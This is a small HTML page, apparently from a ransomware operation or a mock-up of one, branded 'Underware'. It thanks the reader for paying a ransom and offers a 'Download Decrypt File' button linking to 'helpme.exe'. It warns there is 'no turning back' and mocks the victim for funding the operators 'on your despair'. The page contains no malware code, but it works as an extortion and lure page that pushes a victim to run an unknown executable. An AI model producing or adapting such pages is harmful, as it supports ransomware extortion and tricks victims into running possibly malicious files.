<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Decrypt</title>
    <style>
        body {
            background-color: #1a1a1a; /* Dark background */
            color: #EB107A; /* Main text color */
            font-family: 'Courier New', Courier, monospace;
            text-align: center;
            padding: 50px;
        }
        h1 {
            color: #DA3B8A; /* Title color */
            font-size: 48px;
            text-shadow: 2px 2px 10px rgba(218, 59, 138, 0.7);
        }
        .button {
            background-color: #DA3B8A; /* Button color */
            color: #fff;
            border: none;
            padding: 10px 20px;
            border-radius: 5px;
            cursor: pointer;
            font-size: 18px;
            transition: background-color 0.3s;
            margin: 20px auto;
            display: block;
        }
        .button:hover {
            background-color: #c72a6b; /* Button hover color */
        }
        .logo {
            width: 100px;
            height: 100px;
            margin: 20px auto;
        }
    </style>
</head>
<body>
    <h1>Decrypt</h1>
    <img src="underware.png" alt="Underware Logo" class="logo">
    <p>Thank you so much for paying the ransom! We hope the decrypt file works as intended...</p>
    <a href="helpme.exe" download="helpme.exe" class="button">Download Decrypt File</a>
    <p>Warning: The decrypt file is an executable (.exe). Make sure to run it only if you are certain you want to proceed. There will be no turning back...</p>
    <p>A special thanks to you, our dear user, for contributing to our research fund... on your despair.</p>
</body>
</html>